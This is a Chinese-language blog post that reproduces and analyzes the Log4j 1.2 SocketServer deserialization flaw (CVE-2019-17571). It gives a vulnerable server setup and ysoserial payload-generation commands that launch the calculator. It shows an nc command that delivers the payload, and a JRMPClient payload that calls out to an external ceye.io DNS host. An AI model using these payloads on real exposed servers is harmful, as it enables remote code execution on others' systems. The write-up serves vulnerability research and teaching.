[20][03][81] Log4j 反序列化漏洞(CVE-2019-17571)

最新推荐文章于 2024-04-05 09:38:57 发布
最新推荐文章于 2024-04-05 09:38:57 发布
阅读量1.4k 收藏 4
点赞数 1
分类专栏: 信息安全 文章标签: log4j CVE-2019-17571 反序列化漏洞 ysoserial
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57672329/article/details/121981288
版权

文章目录

1. 组件基本信息

1.1 pom 信息

<groupId>log4j</groupId>
<artifactId>log4j</artifactId>

1.2 影响版本

漏洞存在版本 1.2.4 ~ 1.2.17

1.3 漏洞场景

此漏洞需要使用 SimpleSocketServer 开启端口才能够接受 socket 中的数据进行反序列化操作,从而才能利用

通过 socket 通信发送 playload, SimpleSocketServer 接受到消息后,调用 readobject 进行反序列化存在漏洞

2. 漏洞复现

2.1 引入 pom 组件

<dependency>
    <groupId>log4j</groupId>
    <artifactId>log4j</artifactId>
    <version>1.2.17</version>
</dependency>
<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.1</version>
</dependency>

2.2 新建 log4j.properties

在 resources 目录下新建文件

log4j.rootCategory=DEBUG,stdout
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
log4j.appender.stdout.threshold=DEBUG
log4j.appender.stdout.layout.ConversionPattern=[%d{yyy-MM-dd HH:mm:ss,SSS}]-[%p]-[MSG!:%m]-[%c\:%L]%n

2.3 Log4jLeak 代码

public class Log4jLeak {

    public static void main(String[] args) {
        Log4jLeak log4jLeak = new Log4jLeak();
        log4jLeak.CVE_2019_17571();
    }

    /**
     * CVE-2019-17571 漏洞
     */
    private void CVE_2019_17571() {
        System.out.println("Listening on port 1234");
        String[] arguments = {"1234", (new Log4jLeak()).getClass().getClassLoader().getResource("log4j.properties").getPath()};
        SimpleSocketServer.main(arguments);
        System.out.println("Log4j output successfuly");
    }
}

2.4 下载 ysoserial.jar

下载地址

  • 官方地址
    https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
  • CSDN 下载地址
    https://download.csdn.net/download/weixin_57672329/64795994

2.5 生成 playload

使用 ysoserial.jar 生成 playload, 保存到 log4j.bin 文件

# MacOS 系统
java -jar ysoserial.jar CommonsCollections7 "open /System/Applications/Calculator.app" > log4j.bin

# Windows 系统
java -jar ysoserial.jar CommonsCollections7 "calc.exe"  > log4j.bin

2.5 启动程序

运行 Log4jLeak 的 main 方法,启动 ServiceSocket 监听 1234 端口

Listening on port 1234
[2021-12-16 17:51:34,157]-[INFO]-[MSG!:Listening on port 1234]-[org.apache.log4j.net.SimpleSocketServer:60]
[2021-12-16 17:51:34,161]-[INFO]-[MSG!:Waiting to accept a new client.]-[org.apache.log4j.net.SimpleSocketServer:63]

在 log4j.bin 目录下,执行命令与 socket 进行通信,将 playload 的文件 log4j.bin 发送给服务端

nc 127.0.0.1 1234 < log4j.bin

反序列化漏洞利用成功,本地计算器程序被调用

xx

3. 漏洞源码分析

3.1 SimpleSocketServer 类

SimpleSocketServer 类的 main 方法,创建 ServerSocket 监听 1234 端口

xx

3.2 SocketNode 类

ServerSocket 接受到消息后,需要将消息解析,需要使用 SocketNode

(new Thread(new SocketNode(socket, LogManager.getLoggerRepository()), "SimpleSocketServer-" + port)).start();

SocketNode 实现 Runable,最终调用 run() 方法, 漏洞利用点在event = (LoggingEvent)this.ois.readObject();

public void run() {
        try {
            if (this.ois != null) {
                while(true) {
                    LoggingEvent event;
                    Logger remoteLogger;
                    do {
                        event = (LoggingEvent)this.ois.readObject();
                        remoteLogger = this.hierarchy.getLogger(event.getLoggerName());
                    } while(!event.getLevel().isGreaterOrEqual(remoteLogger.getEffectiveLevel()));

                    remoteLogger.callAppenders(event);
                }
            }
        } catch (EOFException var36) {
            ...
        }
    }

4. 反射到外网

反序列化到反射到外网 dns 解析平台

生成 playload, 将命令中的你的 ID 替换成自己申请的地址

java -jar ysoserial.jar JRMPClient "log4j.你的ID.ceye.io"  > log4j-ceye.bin

与 Log4j 的 socket 通信,触发反序列化漏洞的 playload, 反射到外网

nc 127.0.0.1 1234 < log4j-ceye.bin

在 ceye 平台查到的反射记录

xx

安全新司机
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-17571:Apache Log4j 1.2.X存在序列远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在序列远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中存在序列远程代码执行漏洞.攻击者可利用该漏洞执行任意恶意命令.在Log4j 1.2.X中包含一个SocketServer类,该类很容易对不可信数据进行序列,当侦听日志数据的不可信网络流量时,与序列小工具结合使用时,可以利用该类远程执行任意代码.影响包含目前最新版本. 2. 漏洞危害 高危 影响范围 1.2.4 <= Apache Log4j <= 1.2.17(最新版) 修复建议 1.升级到Apache Log4j 2系列最新版 2.禁止将该类所开启的socket端口暴露到互联网 3. 漏洞验证 Apac
Jackson 最新序列漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
Apache Log4j 漏洞分析
m0_73826804的博客
03-07 402
Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具。Log4j 1.2版本中包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列的日志事件并对其进行序列,在结合序列工具使用时,可以利用该类远程执行任意代码。目前官方已在Apache Log4j 2.8.2版本之后修复了该漏洞,请受影响的用户升级至2.8.2 或更高的版本进行防护.方便测试,添加JDK7U21的漏洞环境。
log4j CVE-2019-17571 漏洞复现
01-02 1万+
一、漏洞描述 Log4j1.2版本中包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列的日志事件并对其进行序列,在结合序列工具使用时,可以利用该类远程执行任意代码。 二、漏洞复现 2.1 启动SocketServer端 import org.apache.log4j.Logger; import org.apache.log...
(环境搭建+复现)CVE-2019-17571 Apache Log4j SocketServer 序列漏洞
daxi0ng的博客
04-03 8987
1、【CVE编号】 CVE-2019-17571 2、【漏洞名称】 Apache Log4j SocketServer 序列漏洞 3、【靶标分类】 通用漏洞组件类靶标 4、【影响版本】 Log4j1.2.x<=1.2.17 5、【漏洞分类】 代码执行 6、【漏洞等级】 高 7、【漏洞简介】 Apache Log4j 是一个基于 Java 的日志记录工具,是 Apache 软件基金会的一个...
Apache Log4j 1.2.X序列漏洞(CVE-2019-17571)
weixin_44047654的博客
12-11 1499
Apache Log4j 1.2.X序列漏洞(CVE-2019-17571)
探索 CVE-2019-17571:一款用于网络安全研究的重要工具
最新发布
gitblog_00007的博客
04-05 444
探索 CVE-2019-17571:一款用于网络安全研究的重要工具 项目地址:https://gitcode.com/shadow-horse/CVE-2019-17571 在网络安全的世界里,了解漏洞并学习如何防护或利用它们是至关重要的。CVE-2019-17571 是一个公开的开源项目,它专注于研究针对 FortiOS 设备的一个严重漏洞。本文将深入探讨这个项目的细节,其技术背景,用途,以及为...
weblogic序列漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic序列漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
JBossMQJMS 序列漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 序列漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理序列的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
CVE-2019-17564 Apache-Dubbo序列漏洞.md
04-12
CVE-2019-17564,Apache-Dubbo序列漏洞
log4j序列漏洞分析(CVE-2019-17571)
杭州七先生的个人博客
04-07 1万+
前言 Apache Log4j序列漏洞 影响版本 1.2.4 <= Apache Log4j <= 1.2.17 漏洞复现 idea新建一个项目,如下图所示: log4j: import org.apache.log4j.net.SimpleSocketServer; public class log4j { public static void main(String[] args) { System.out.println("Listening on port
Java安全之log4j序列漏洞分析
qq_43966957的博客
12-29 780
log4j用的其实还是比较多,记录一些Java的日志,这个相信接触过Java的都知道,在此不做多的赘诉。漏洞版本:CVE-2019-17571漏洞原因是因为调用开启一个端口,进行接受数据,进行序列操作。根据官方描述作用是把接受到的作为本地的日志记录事件,再使用在服务器端配置的Log4J环境来记录日志。默认可能会开启在4560端口中。
Log4j2 序列漏洞原理与复现
FisrtBqy的博客
05-15 4058
Log4j2 RCE漏洞原理与复现
log4j序列漏洞详解及利用
Mr.Wang的博客
12-20 1万+
Log4j漏洞详解:带你体验一把hacker之路!
log4j序列漏洞复现
qq_52263650的博客
05-31 850
Apache Log4j 是一个用于 Java 的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2 之前的 2.x 版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
【java安全】Log4j序列漏洞
leekos的博客,分享web安全相关知识~
08-18 2095
Log4j是Apache的开源项目,可以实现对System.out等打印语句的替代,并且可以结合spring等项目,实现把日志输出到控制台或文件等。本文介绍的Log4j序列漏洞都是由于未对传入的需要发序列的数据进行过滤,导致了恶意构造从而造成相关的序列漏洞。方法进行序列,并且整个步骤没有任何过滤,因此当我们传入的数据为恶意的cc链就可以触发序列漏洞了。我们运行一下这个类,它会监听本地的7777端口,然后我们需要将数据传递进去。这里和上面类似,也会将接受到的数据以。的构造方法,返回一个。
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
apache log4j漏洞复现
热门推荐
Shanfenglan's blog
12-10 6万+
文章目录1. Apache Log4j Server 序列命令执行漏洞CVE-2017-5645)利用条件利用2. CVE-2019-17571利用条件利用3. apache log4j rce利用条件环境搭建利用 1. Apache Log4j Server 序列命令执行漏洞CVE-2017-5645) Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 利用条件
Jackson 最新序列漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新序列漏洞CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的序列功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.9.x 版本。 CVE-2019-14439 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.6.x 至 2.9.x 版本。 为了解决这些漏洞,建议开发人员尽快升级到最新版本的 Jackson-databind 库。另外,还可以考虑限制序列操作的使用,以减少潜在的风险。记住及时关注安全公告,并采取相应的措施来保护应用程序免受可能的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值